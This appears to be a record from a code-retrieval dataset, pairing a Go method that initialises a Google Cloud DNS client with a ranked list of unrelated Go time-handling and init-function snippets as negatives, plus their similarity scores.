time.Duration) Time {\n\treturn NewTime(nt.Time.Add(d))\n}", "func NewSendingTimeWithPrecision(val time.Time, precision quickfix.TimestampPrecision) SendingTimeField {\n\treturn SendingTimeField{quickfix.FIXUTCTimestamp{Time: val, Precision: precision}}\n}", "func TimeGT(v string) predicate.Announcement {\n\treturn predicate.Announcement(func(s *sql.Selector) {\n\t\ts.Where(sql.GT(s.C(FieldTime), v))\n\t})\n}", "func ExampleTime_AddDate() {\n\tvar (\n\t\tyear = 1\n\t\tmonth = 2\n\t\tday = 3\n\t)\n\tgt := gtime.New(\"2018-08-08 08:08:08\")\n\tgt = gt.AddDate(year, month, day)\n\n\tfmt.Println(gt)\n\n\t// Output:\n\t// 2019-10-11 08:08:08\n}", "func AddtimeAppointGTE(v time.Time) predicate.AppointmentResults {\n\treturn predicate.AppointmentResults(func(s *sql.Selector) {\n\t\ts.Where(sql.GTE(s.C(FieldAddtimeAppoint), v))\n\t})\n}", "func GetSignalTime(timeUnit int32, refDate time.Time) time.Time {\n\tvar t time.Time\n\tswitch timeUnit {\n\tcase SignalTimeUnit_NOW:\n\t\t{\n\t\t\treturn refDate.UTC().Truncate(time.Hour * 24)\n\t\t}\n\tcase SignalTimeUnit_MONTH:\n\t\t{\n\t\t\tt = refDate.UTC().AddDate(0, 0, -30)\n\t\t}\n\tcase SignalTimeUnit_BIMONTH:\n\t\t{\n\t\t\tt = refDate.UTC().AddDate(0, 0, -60)\n\t\t}\n\tcase SignalTimeUnit_QUARTER:\n\t\t{\n\t\t\tt = refDate.UTC().AddDate(0, 0, -90)\n\t\t}\n\tcase SignalTimeUnit_HALFYEAR:\n\t\t{\n\t\t\tt = refDate.UTC().AddDate(0, 0, -180)\n\t\t}\n\tcase SignalTimeUnit_THIRDQUARTER:\n\t\t{\n\t\t\tt = refDate.UTC().AddDate(0, 0, -270)\n\t\t}\n\tcase SignalTimeUnit_YEAR:\n\t\t{\n\t\t\tt = refDate.UTC().AddDate(0, 0, -365)\n\t\t}\n\t}\n\n\treturn t.Truncate(time.Hour * 24)\n}", "func (m *MetricsProvider) AddOperationTime(value time.Duration) {\n}", "func AddtimeSaveGTE(v time.Time) predicate.AppointmentResults {\n\treturn predicate.AppointmentResults(func(s *sql.Selector) {\n\t\ts.Where(sql.GTE(s.C(FieldAddtimeSave), v))\n\t})\n}", "func RandomTime(t time.Time, r time.Duration) time.Time {\n\treturn t.Add(-time.Duration(float64(r) * rand.Float64()))\n}", "func TimeGTE(v string) predicate.Announcement {\n\treturn predicate.Announcement(func(s *sql.Selector) {\n\t\ts.Where(sql.GTE(s.C(FieldTime), v))\n\t})\n}", "func (t ntpTime) Time() time.Time {\n\treturn ntpEpoch.Add(t.Duration())\n}", "func AddedTimeGT(v time.Time) predicate.Medicalfile {\n\treturn predicate.Medicalfile(func(s *sql.Selector) {\n\t\ts.Where(sql.GT(s.C(FieldAddedTime), v))\n\t})\n}", "func timeExpired() int64 {\n\ttimeExpired := timeStamp() + 60\n\n\treturn timeExpired\n}", "func Time() time.Time {\n\tnow := time.Now().UTC()\n\tdif := time.Duration(rand.Int())\n\tstart := now.Add(dif * -1)\n\tend := now.Add(dif)\n\treturn TimeSpan(start, end)\n}", "func NowAddMinutes(minutes int) time.Time {\n\treturn time.Now().Add(time.Duration(minutes) * OneMin)\n}", "func (o BudgetResourceGroupOutput) TimeGrain() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *BudgetResourceGroup) pulumi.StringPtrOutput { return v.TimeGrain }).(pulumi.StringPtrOutput)\n}", "func Time(t time.Time) int64 {\n\treturn t.UnixNano() / 1000000\n}" ]
[ "0.8909693", "0.8903045", "0.88976306", "0.8885725", "0.8846816", "0.8846816", "0.88360655", "0.88360655", "0.8815402", "0.8815402", "0.8815402", "0.8815402", "0.8773541", "0.8761344", "0.87517613", "0.87358516", "0.8727222", "0.87032026", "0.8683116", "0.86745614", "0.86522233", "0.8651706", "0.86267495", "0.86203235", "0.86203235", "0.8470222", "0.8439351", "0.821529", "0.81848836", "0.794324", "0.7916844", "0.6803734", "0.58501273", "0.5794045", "0.5729258", "0.56890535", "0.5559313", "0.544609", "0.5433735", "0.5389565", "0.53543955", "0.53449506", "0.5303504", "0.52993", "0.52719986", "0.52657914", "0.5265005", "0.5248465", "0.52291703", "0.5224654", "0.52117705", "0.520927", "0.51887923", "0.51887923", "0.5179909", "0.517215", "0.51670724", "0.51639915", "0.51433414", "0.51381254", "0.51161563", "0.50952744", "0.50888157", "0.5063276", "0.5053455", "0.5053455", "0.50388163", "0.50378186", "0.5022623", "0.5012768", "0.5007737", "0.5003449", "0.49961188", "0.49899578", "0.4970944", "0.4965983", "0.49657702", "0.49537474", "0.4953524", "0.4944649", "0.49358138", "0.49238235", "0.49204573", "0.49099976", "0.49064127", "0.48896953", "0.4882213", "0.48672283", "0.48606387", "0.48561192", "0.48549038", "0.48449805", "0.48428255", "0.48414293", "0.48401713", "0.4820129", "0.48196575", "0.48187616", "0.48140338", "0.48093924" ]
0.87901026
12
Initialize sets up necessary googleprovided sdks and other local data
func (d *DNS) Initialize(credentials string, log logger.Interface) error { var err error ctx := context.Background() d.log = log d.PendingWaitSeconds = 5 d.Calls = &Calls{ ChangesCreate: &calls.ChangesCreateCall{}, ResourceRecordSetsList: &calls.ResourceRecordSetsListCall{}, } if credentials != "" { if d.V1, err = v1.NewService(ctx, option.WithCredentialsJSON([]byte(credentials))); err != nil { return err } } else { if d.V1, err = v1.NewService(ctx); err != nil { return err } } return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func init() {\n\tconfigDir := \"\"\n\tdataDir := \"\"\n\tcacheDir := \"\"\n\n\th := \"\"\n\tu, e := user.Current()\n\tif nil == e {\n\t\th = u.HomeDir\n\n\t\tconfigDir = os.Getenv(\"XDG_CONFIG_HOME\")\n\t\tdataDir = os.Getenv(\"XDG_DATA_HOME\")\n\t\tcacheDir = os.Getenv(\"XDG_CACHE_HOME\")\n\n\t\tif \"\" == configDir {\n\t\t\tconfigDir = filepath.Join(h, \".config\")\n\t\t}\n\n\t\tif \"\" == dataDir {\n\t\t\tdataDir = filepath.Join(h, \".local/share\")\n\t\t}\n\n\t\tif \"\" == cacheDir {\n\t\t\tcacheDir = filepath.Join(h, \".cache\")\n\t\t}\n\t}\n\n\tDefaultAppData = &systemAppData{configDir, dataDir, cacheDir, e}\n}", "func init() {\n\tglobalconfig.EnsureGlobalConfig()\n\t_ = os.Setenv(\"DOCKER_CLI_HINTS\", \"false\")\n\t_ = os.Setenv(\"MUTAGEN_DATA_DIRECTORY\", globalconfig.GetMutagenDataDirectory())\n\t// GetDockerClient should be called early to get DOCKER_HOST set\n\t_ = dockerutil.GetDockerClient()\n}", "func Initialize() {\n\tonce.Do(func(){\n\t\t// Ensure all dependencies are initialized\n\t\tconstructs.Initialize()\n\n\t\t// Load this library into the kernel\n\t\trt.Load(\"cdk8s\", \"1.0.0-beta.8\", tarball)\n\t})\n}", "func init() {\n\t// loads values from .env into the system\n\tif err := godotenv.Load(); err != nil {\n\t\tlog.Print(\"No .env file found\")\n\t}\n\n\tconfig = &oauth2.Config{\n\t\tClientID: getEnv(\"GOOGLE_OAUTH_CLIENTID\"),\n\t\tClientSecret: getEnv(\"GOOGLE_OAUTH_CLIENTSECRET\"),\n\t\tEndpoint: google.Endpoint,\n\t\tRedirectURL: getEnv(\"GOOGLE_OAUTH_REDIRECT_URL\"),\n\t\tScopes: []string{\n\t\t\t\"https://www.googleapis.com/auth/spreadsheets.readonly\",\n\t\t\t\"https://www.googleapis.com/auth/spreadsheets\",\n\t\t\t\"https://www.googleapis.com/auth/userinfo.email\",\n\t\t\t\"https://www.googleapis.com/auth/drive\",\n\t\t\t\"https://www.googleapis.com/auth/drive.file\",\n\t\t\t\"https://www.googleapis.com/auth/drive.readonly\",\n\t\t\t\"https://www.googleapis.com/auth/drive.metadata.readonly\",\n\t\t\t\"https://www.googleapis.com/auth/drive.appdata\",\n\t\t\t\"https://www.googleapis.com/auth/drive.metadata\",\n\t\t\t\"https://www.googleapis.com/auth/drive.photos.readonly\",\n\t\t\tsheet.Scope,\n\t\t},\n\t}\n}", "func init() {\n\tlog.SetFlags(0)\n\tlog.SetPrefix(\":: \")\n\n\tif XDG_CONFIG_HOME == \"\" {\n\t\tXDG_CONFIG_HOME = filepath.Join(os.Getenv(\"HOME\"), \".config\")\n\t}\n\n\tif XDG_DATA_DIRS == \"\" {\n\t\tXDG_DATA_DIRS = \"/usr/local/share/:/usr/share\"\n\t}\n\n\tcache.actions = make(map[string]string)\n\tcache.actionFiles = make(map[string]string)\n\tcache.scriptFiles = make(map[string]string)\n\n\tconfig = os.Getenv(\"DEMLORC\")\n\tif config == \"\" {\n\t\tconfig = filepath.Join(XDG_CONFIG_HOME, application, application+\"rc\")\n\t}\n}", "func init() {\n\tinitCfgDir()\n\tinitCreds()\n}", "func init() {\n\tloadTheEnv()\n\tcreateDBInstance()\n\tloadRepDB()\n\tstartKafka()\n}", "func init() {\n\tvar p vm.Provider = &Provider{}\n\tif _, err := exec.LookPath(\"gcloud\"); err != nil {\n\t\tp = flagstub.New(p, \"please install the gcloud CLI utilities \"+\n\t\t\t\"(https://cloud.google.com/sdk/downloads)\")\n\t} else {\n\t\tgceP := makeProvider()\n\t\tp = &gceP\n\t}\n\tvm.Providers[ProviderName] = p\n}", "func init() {\n\t// bootstrap cosmos-sdk config for kava chain\n\tkavaConfig := sdk.GetConfig()\n\tapp.SetBech32AddressPrefixes(kavaConfig)\n\tapp.SetBip44CoinType(kavaConfig)\n\tkavaConfig.Seal()\n}", "func init() {\n\t// TODO: set logger\n\t// TODO: register storage plugin to plugin manager\n}", "func (g *gcp) Init() error {\n\treturn nil\n}", "func init() {\n\tRegisterSdkLibraryBuildComponents(android.InitRegistrationContext)\n\n\tandroid.RegisterMakeVarsProvider(pctx, func(ctx android.MakeVarsContext) {\n\t\tjavaSdkLibraries := javaSdkLibraries(ctx.Config())\n\t\tsort.Strings(*javaSdkLibraries)\n\t\tctx.Strict(\"JAVA_SDK_LIBRARIES\", strings.Join(*javaSdkLibraries, \" \"))\n\t})\n\n\t// Register sdk member types.\n\tandroid.RegisterSdkMemberType(javaSdkLibrarySdkMemberType)\n}", "func init() {\n\tvar err error\n\tclient, err = sdscontroller.GetClient(\"\", \"\")\n\tif client == nil || err != nil {\n\t\tglog.Errorf(\"client init failed, %s\", err.Error())\n\t\treturn\n\t}\n}", "func (g *gcs) Init(ctx context.Context) (err error) {\n\tg.context = context.Background()\n\n\tgcsClient, err := storage.NewClient(g.context, option.WithCredentialsFile(g.credentialsJSON))\n\tif err != nil {\n\t\treturn\n\t}\n\n\tg.bucket = gcsClient.Bucket(g.bucketName)\n\tg.client = gcsClient\n\n\treturn\n}", "func init() {\n\tif err := RegisterDriver(k8s.Name, NewK8S); err != nil {\n\t\tpanic(err.Error())\n\t}\n}", "func init() {\n\tRegistry.Add(eksinfo.New())\n\tRegistry.Add(vpcinfo.New())\n\tRegistry.Add(iamresourceusage.New())\n}", "func (m *Main) Init() error {\n\n\tlog.Printf(\"Loading GeoCode data ...\")\n\t//u.LoadGeoCodes()\n\n\tvar err error\n\tm.indexer, err = pdk.SetupPilosa(m.Hosts, m.IndexName, u.Frames, m.BufferSize)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Error setting up Pilosa '%v'\", err)\n\t}\n\t//m.client = m.indexer.Client()\n\n\t// Initialize S3 client\n\tsess, err2 := session.NewSession(&aws.Config{\n\t\tRegion: aws.String(m.AWSRegion)},\n\t)\n\n\tif err2 != nil {\n\t\treturn fmt.Errorf(\"Creating S3 session: %v\", err2)\n\t}\n\n\t// Create S3 service client\n\tm.S3svc = s3.New(sess)\n\n\treturn nil\n}", "func Initialize(cfg Config) {\n\tvar err error\n\tif cfg.UseKms {\n\t\t// FIXME(xnum): set at cmd.\n\t\tif utils.FullnodeCluster != utils.Environment() {\n\t\t\tif err = initKmsClient(); err != nil {\n\t\t\t\tpanic(err.Error())\n\t\t\t}\n\t\t}\n\t}\n\n\tswitch cfg.Source {\n\tcase None:\n\t\tgetters = []Getter{noneGetter}\n\tcase K8S:\n\t\tgetters = []Getter{k8sGetter}\n\tcase File:\n\t\tgetters = []Getter{staticGetter}\n\t\tif err = initDataFromFile(); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t// FIXME(xnum): not encourge to use. It depends on env.\n\tcase Auto:\n\t\tif utils.Environment() == utils.LocalDevelopment ||\n\t\t\tutils.Environment() == utils.CI {\n\t\t\tgetters = []Getter{staticGetter}\n\t\t\terr := initDataFromFile()\n\t\t\tif err != nil {\n\t\t\t\tlog.Panicln(err)\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tgetters = []Getter{k8sGetter}\n\t}\n}", "func init() {\n\thome = os.Getenv(\"HOME\")\n\tXDGHome = os.Getenv(\"XDG_CONFIG_HOME\")\n\tconfPath = path.Join(\"/etc\", programName, confName)\n\tos.Clearenv()\n\t// TODO Clean up test files\n}", "func init() {\n\truntime.GOMAXPROCS(runtime.NumCPU())\n\tappAddr = os.Getenv(\"APP_ADDR\") // e.g. \"0.0.0.0:8080\" or \"\"\n\n\tconf = new(app.ConfigConode)\n\tif err := app.ReadTomlConfig(conf, defaultConfigFile); err != nil {\n\t\tfmt.Printf(\"Couldn't read configuration file: %v\", err)\n\t\tos.Exit(1)\n\t}\n\n\tsuite = app.GetSuite(conf.Suite)\n\tpub, _ := base64.StdEncoding.DecodeString(conf.AggPubKey)\n\tsuite.Read(bytes.NewReader(pub), &public_X0)\n}", "func init() {\n\tos.RemoveAll(DataPath)\n\n\tdc := DatabaseConfig{\n\t\tDataPath: DataPath,\n\t\tIndexDepth: 4,\n\t\tPayloadSize: 16,\n\t\tBucketDuration: 3600000000000,\n\t\tResolution: 60000000000,\n\t\tSegmentSize: 100000,\n\t}\n\n\tcfg := &ServerConfig{\n\t\tVerboseLogs: true,\n\t\tRemoteDebug: true,\n\t\tListenAddress: Address,\n\t\tDatabases: map[string]DatabaseConfig{\n\t\t\tDatabase: dc,\n\t\t},\n\t}\n\n\tdbs := map[string]kdb.Database{}\n\tdb, err := dbase.New(dbase.Options{\n\t\tDatabaseName: Database,\n\t\tDataPath: dc.DataPath,\n\t\tIndexDepth: dc.IndexDepth,\n\t\tPayloadSize: dc.PayloadSize,\n\t\tBucketDuration: dc.BucketDuration,\n\t\tResolution: dc.Resolution,\n\t\tSegmentSize: dc.SegmentSize,\n\t})\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tdbs[\"test\"] = db\n\td = db\n\to = dc\n\n\ts = NewServer(dbs, cfg)\n\tgo s.Listen()\n\n\t// wait for the server to start\n\ttime.Sleep(time.Second * 2)\n\n\tc = NewClient(Address)\n\tif err := c.Connect(); err != nil {\n\t\tpanic(err)\n\t}\n}", "func Initialize(ctx context.Context, global *Global) (err error) {\n\tlog.SetFlags(0)\n\tglobal.ctx = ctx\n\n\tvar instanceDeployment InstanceDeployment\n\tvar storageClient *storage.Client\n\n\tinitID := fmt.Sprintf(\"%v\", uuid.New())\n\terr = ffo.ReadUnmarshalYAML(solution.PathToFunctionCode+solution.SettingsFileName, &instanceDeployment)\n\tif err != nil {\n\t\tlog.Println(glo.Entry{\n\t\t\tSeverity: \"CRITICAL\",\n\t\t\tMessage: \"init_failed\",\n\t\t\tDescription: fmt.Sprintf(\"ReadUnmarshalYAML %s %v\", solution.SettingsFileName, err),\n\t\t\tInitID: initID,\n\t\t})\n\t\treturn err\n\t}\n\n\tglobal.environment = instanceDeployment.Core.EnvironmentName\n\tglobal.instanceName = instanceDeployment.Core.InstanceName\n\tglobal.microserviceName = instanceDeployment.Core.ServiceName\n\n\tlog.Println(glo.Entry{\n\t\tMicroserviceName: global.microserviceName,\n\t\tInstanceName: global.instanceName,\n\t\tEnvironment: global.environment,\n\t\tSeverity: \"NOTICE\",\n\t\tMessage: \"coldstart\",\n\t\tInitID: initID,\n\t})\n\n\tglobal.assetsCollectionID = instanceDeployment.Core.SolutionSettings.Hosting.FireStore.CollectionIDs.Assets\n\tglobal.ownerLabelKeyName = instanceDeployment.Core.SolutionSettings.Monitoring.LabelKeyNames.Owner\n\tglobal.retryTimeOutSeconds = instanceDeployment.Settings.Service.GCF.RetryTimeOutSeconds\n\tglobal.violationResolverLabelKeyName = instanceDeployment.Core.SolutionSettings.Monitoring.LabelKeyNames.ViolationResolver\n\tprojectID := instanceDeployment.Core.SolutionSettings.Hosting.ProjectID\n\n\tstorageClient, err = storage.NewClient(ctx)\n\tif err != nil {\n\t\tlog.Println(glo.Entry{\n\t\t\tMicroserviceName: global.microserviceName,\n\t\t\tInstanceName: global.instanceName,\n\t\t\tEnvironment: global.environment,\n\t\t\tSeverity: \"CRITICAL\",\n\t\t\tMessage: \"init_failed\",\n\t\t\tDescription: fmt.Sprintf(\"storage.NewClient(ctx) %v\", err),\n\t\t\tInitID: initID,\n\t\t})\n\t\treturn err\n\t}\n\t// bucketHandle must be evaluated after storateClient init\n\tglobal.bucketHandle = storageClient.Bucket(instanceDeployment.Core.SolutionSettings.Hosting.GCS.Buckets.AssetsJSONFile.Name)\n\n\tglobal.cloudresourcemanagerService, err = cloudresourcemanager.NewService(ctx)\n\tif err != nil {\n\t\tlog.Println(glo.Entry{\n\t\t\tMicroserviceName: global.microserviceName,\n\t\t\tInstanceName: global.instanceName,\n\t\t\tEnvironment: global.environment,\n\t\t\tSeverity: \"CRITICAL\",\n\t\t\tMessage: \"init_failed\",\n\t\t\tDescription: fmt.Sprintf(\"cloudresourcemanager.NewService(ctx) %v\", err),\n\t\t\tInitID: initID,\n\t\t})\n\t\treturn err\n\t}\n\tglobal.cloudresourcemanagerServiceV2, err = cloudresourcemanagerv2.NewService(ctx)\n\tif err != nil {\n\t\tlog.Println(glo.Entry{\n\t\t\tMicroserviceName: global.microserviceName,\n\t\t\tInstanceName: global.instanceName,\n\t\t\tEnvironment: global.environment,\n\t\t\tSeverity: \"CRITICAL\",\n\t\t\tMessage: \"init_failed\",\n\t\t\tDescription: fmt.Sprintf(\"cloudresourcemanagerv2.NewService(ctx) %v\", err),\n\t\t\tInitID: initID,\n\t\t})\n\t\treturn err\n\t}\n\tglobal.firestoreClient, err = firestore.NewClient(ctx, projectID)\n\tif err != nil {\n\t\tlog.Println(glo.Entry{\n\t\t\tMicroserviceName: global.microserviceName,\n\t\t\tInstanceName: global.instanceName,\n\t\t\tEnvironment: global.environment,\n\t\t\tSeverity: \"CRITICAL\",\n\t\t\tMessage: \"init_failed\",\n\t\t\tDescription: fmt.Sprintf(\"firestore.NewClient(ctx, projectID) %v\", err),\n\t\t\tInitID: initID,\n\t\t})\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *Service) Initialize(ctx context.Context) error {\n\treturn s.kv.Update(ctx, func(tx Tx) error {\n\t\tif err := s.initializeAuths(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeDocuments(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeBuckets(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeDashboards(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeKVLog(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeLabels(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeOnboarding(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeOrgs(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeTasks(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializePasswords(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeScraperTargets(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeSecrets(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeSessions(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeSources(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeTelegraf(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeURMs(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeVariables(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeChecks(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeNotificationRule(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := s.initializeNotificationEndpoint(ctx, tx); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\treturn s.initializeUsers(ctx, tx)\n\t})\n}", "func init() {\n\t// loads values from .env into the system\n\tif err := godotenv.Load(); err != nil {\n\t\tlog.Print(\"No .env file found\")\n\t}\n}", "func init() {\n\tif STORMPATH_API_KEY_ID == \"\" {\n\t\tlog.Fatal(\"STORMPATH_API_KEY_ID not set in the environment.\")\n\t} else if STORMPATH_API_KEY_SECRET == \"\" {\n\t\tlog.Fatal(\"STORMPATH_API_KEY_SECRET not set in the environment.\")\n\t}\n\n\t// Generate a globally unique UUID to be used as a prefix throughout our\n\t// testing.\n\tuuid, err := uuid.NewV4()\n\tif err != nil {\n\t\tlog.Fatal(\"UUID generation failed.\")\n\t}\n\n\t// Store our test prefix.\n\tTEST_PREFIX = uuid.String() + \"-\"\n\n\t// Generate a Stormpath client we'll use for all our tests.\n\tclient, err := NewClient(&ApiKeyPair{\n\t\tId: STORMPATH_API_KEY_ID,\n\t\tSecret: STORMPATH_API_KEY_SECRET,\n\t})\n\tif err != nil {\n\t\tlog.Fatal(\"Couldn't create a Stormpath client.\")\n\t}\n\tCLIENT = client\n}", "func init() {\n\tcloudprovider.RegisterCloudProvider(providerName, newCloudConnection)\n}", "func init() {\n\tvar err error\n\tvfs, err = statikfs.New()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n}", "func Initialize() error {\n\tenv, err := Env()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfmt.Println(\"Enviroment: \", env)\n\n\tconf, err := config.NewConfig(env)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tdbInstances, err := db.NewInitializedInstances(conf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tgrpcCons, err := grpcPkg.NewInitializeConnections(conf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = StartServers(conf, dbInstances, grpcCons)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func init() {\n\tlog.Printf(\"INIT()\")\n\t// This key must be the same across all GAE instances in order to decrypt session data\n\tc := NewContainer(Properties{P_APPLICATIONKEY: \"APPKEY_CHANGEME_________________\"})\n\n\tc.Redirect(\"/\", \"/p/\")\n\n\tsms := NewSharemeService()\n\tc.ExposeInterface(sms, InterfaceName)\n\tc.ExposeInterface(&imgsrv.ImageService{}, \"Image\")\n\tc.EnableFileServer(\"htdocs\", \"p\")\n\n\tub, _ := c.Binding(InterfaceName, \"HandleUpload\")\n\tsms.storageService = &BlobstoreStorageService{ub.Url().Path}\n\n\tc.ExposeYourself()\n\n\tgae.SetupAndStart(c)\n\thttp.HandleFunc(\"/cleanup\", HandleCleanup)\n}", "func init() {\n\t// loads values from .env into the system\n\tif err := godotenv.Load(); err != nil {\n\t\tlog.Fatal(\"No .env file found\")\n\t}\n}", "func (s *GCPCKMSSeal) Init(_ context.Context) error {\n\treturn nil\n}", "func init() {\n\t// metrics url\n\tlocation = os.Getenv(\"MD_URL\")\n\tif location == \"\" {\n\t\tlocation = \"/metrics\"\n\t}\n\t// listen port\n\tlisten = os.Getenv(\"MD_LISTEN\")\n\tif listen == \"\" {\n\t\tlisten = \":8080\"\n\t}\n\t// mount path of /sys filesystem\n\tsysPath = os.Getenv(\"MD_SYSPATH\")\n\tif sysPath == \"\" {\n\t\tsysPath = \"/sys\"\n\t}\n\t// set hostname label\n\thost = os.Getenv(\"MD_HOST\")\n\tif host == \"\" {\n\t\thost, _ = os.Hostname()\n\t}\n\t// slice of devices filepaths [\"/sys/block/md0\", \"/sys/block/md1\", ...]\n\tmdFiles, _ = filepath.Glob(fmt.Sprintf(\"%s/block/md*\", sysPath))\n}", "func init() {\n\t// Load Env vars\n\tgotenv.Load()\n}", "func init() {\n\tcfg, err := config.LoadDefaultConfig(context.TODO())\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\ts3Client = s3.NewFromConfig(cfg)\n\tpsClient = s3.NewPresignClient(s3Client)\n}", "func init() {\n\t_ = godotenv.Load()\n}", "func init() {\n\tsetUpConfig()\n\tsetUpUsingEnv()\n}", "func init() {\n\tcfg = pkg.InitializeConfig()\n\t_, err := pkg.InitializeDb()\n\tif err != nil {\n\t\tpanic(\"failed to initialize db connection : \" + err.Error())\n\t}\n}", "func init() {\n\tl := logrus.New()\n\tl.SetLevel(logrus.ErrorLevel)\n\n\tInitLog(l)\n\n\tbytes, err := Asset(\"data/geo.mmdb\")\n\tif err != nil {\n\t\tl.Error(errors.Wrap(err, \"providers: cannot access embedded geoip database\"))\n\t\treturn\n\t}\n\n\tinternal, err := geoip2.FromBytes(bytes)\n\tif err != nil {\n\t\tl.Error(errors.Wrap(err, \"providers: cannot access embedded geoip database\"))\n\t\treturn\n\t}\n\n\tcountryInfo = &countryDB{db: internal, query: gountries.New(), initialised: true}\n\n}", "func init() {\n\tSetup()\n}", "func init() {\n\t// set our prefix to loading for initialization\n\ts.Prefix = \"Loading \"\n\tdisplayStatus(true)\n\t// first we load our .env file into the environment\n\terr := godotenv.Load()\n\n\t// check if there was an error loading it\n\tif err != nil {\n\t\tlog.Fatal(\"Error loading .env file\")\n\t}\n}", "func init() {\n\trunEnv := os.Getenv(\"RUN_ENV\")\n\n\tif runEnv == \"prod\" {\n\t\tlistPath = \"list.json\"\n\t\tpricesPath = \"prices.json\"\n\t} else {\n\t\tlistPath = \"storage/list.json\"\n\t\tpricesPath = \"storage/prices.json\"\n\t}\n}", "func init() {\n\terr := sentry.Init(sentry.ClientOptions{})\n\tif err != nil {\n\t\tlog.Panicf(\"sentry.Init: %s\", err)\n\t}\n}", "func init() {\n\tgoPaths := strings.Split(filepath.Join(os.Getenv(\"GOPATH\"), \"src/github.com/databrary/databrary-backend-go/\"), \":\")\n\t// if there's a vendor directory then there will be two gopaths (that's how vendoring works). we want the second one\n\t// which is the actual gopath\n\tif len(goPaths) == 2 {\n\t\tprojRoot = goPaths[1]\n\t} else if len(goPaths) == 1 {\n\t\tprojRoot = goPaths[0]\n\t} else {\n\t\tpanic(fmt.Sprintf(\"unexpected gopath %#v\", goPaths))\n\t}\n\n\tconfigPath = kingpin.Flag(\"config\", \"Path to config file\").\n\t\tDefault(filepath.Join(projRoot, \"config/databrary_dev.toml\")).\n\t\tShort('c').\n\t\tString()\n\n\t// parse command line flags\n\tkingpin.Version(\"0.0.0\")\n\tkingpin.Parse()\n\n\tif configPath, err := filepath.Abs(*configPath); err != nil {\n\t\tpanic(\"command line config file path error\")\n\t} else {\n\t\tlog.InitLgr(config.InitConf(configPath))\n\t}\n\n\t// initialize db connection\n\terr := db.InitDB(config.GetConf())\n\tif err != nil {\n\t\tpanic(err.Error())\n\t}\n\n\t// initialize redis connection\n\tredis.InitRedisStore(config.GetConf())\n\n\tif config.GetConf().GetString(\"log.level\") == \"DEBUG\" {\n\t\t// print to stdout the sql generated by sqlboiler\n\t\tboil.DebugMode = true\n\t}\n}", "func init() {\n\tif err := loadEnvironment(); err != nil {\n\t\tlog.Printf(\"Error with env: %s\", err)\n\t}\n}", "func init() {\n // loads values from .env into the system\n if err := godotenv.Load(); err != nil {\n log.Print(\"No .env file found\")\n }\n}", "func InitLibs() (*datastore.Client, *storage.BucketHandle) {\n\tVerifyEnvironment()\n\treturn InitDatastore(), InitStorage()\n}", "func init() {\n\thome, _ := os.UserHomeDir()\n\n\tGlobalConfig = GlobalOpts{\n\t\tInstallDir: filepath.Join(home, \"probr\"),\n\t\tGodogResultsFormat: \"cucumber\",\n\t\tStartTime: time.Now(),\n\t}\n\tSetTmpDir(filepath.Join(home, \"probr\", \"tmp\")) // TODO: this needs error handling\n}", "func init() {\n\tpctx.Import(\"android/soong/android\")\n\tRegisterPrebuiltEtcBuildComponents(android.InitRegistrationContext)\n}", "func init() {\n\tauth, err := aws.EnvAuth()\n\tif err != nil {\n\t\trev.ERROR.Fatalln(`AWS Authorization Required.\nPlease set AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environment variables.`)\n\t}\n\tPHOTO_BUCKET = s3.New(auth, aws.USEast).Bucket(\"photoboard\")\n}", "func initDirectories() error {\n\t// cacheDir is used to store the Kafka and Zookeeper archives\n\tdir, err := os.UserCacheDir()\n\tif err != nil {\n\t\treturn err\n\t}\n\tcacheDir = filepath.Join(dir, \"kcm\")\n\n\tif err := os.MkdirAll(cacheDir, 0755); err != nil {\n\t\treturn err\n\t}\n\n\t// dataDir is used to store the database and other config files\n\tdir, err = os.UserHomeDir()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdataDir = filepath.Join(dir, \".kcm\")\n\n\tif err := os.MkdirAll(dataDir, 0755); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func initialize() {\n\t// initailze exposed interfaes for further use\n\tiNike = nike.NewNike()\n\tiDcNet = dc.NewDCNetwork()\n}", "func init() {\n\tif err := godotenv.Load(); err != nil 